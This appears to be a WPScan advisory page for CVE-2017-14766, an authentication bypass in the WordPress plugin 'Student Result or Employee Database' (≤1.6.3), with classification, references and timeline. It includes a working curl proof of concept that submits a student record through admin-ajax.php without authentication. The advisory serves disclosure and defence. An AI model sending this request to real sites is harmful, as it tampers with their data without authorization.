Student Result or Employee Database <= 1.6.3 - Auth Bypass

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
curl -i -s -k  -X 'POST' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: http://localhost/wp-admin/admin.php?page=ssr_add_results' --data-binary 'action=ssr_add_st_submit&rid=123&rn=456&stn=john&stfn=smith&stpy=2017&stcgpa=5.00&stsub=Subject+3&stpy2=01011990&stpy3=male&stpy4=address&stpy5=smith&stpy6=extra1&stpy7=extra2&upload_image=' 'https://localhost/wp-admin/admin-ajax.php'

Affects Plugin

fixed in version 1.6.4

References

CVE 2017-14766
URL https://limbenjamin.com/articles/simple-student-result-auth-bypass.html
URL https://plugins.trac.wordpress.org/changeset/1733325/simple-student-result

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Submitter Benjamin Lim
Submitter Website https://limbenjamin.com
Views 60
Verified No
WPVDB ID 8920

Timeline

Publicly Published 2017-09-21 (about 1 month ago)
Added 2017-09-28 (26 days ago)
Last Updated 2017-09-29 (25 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.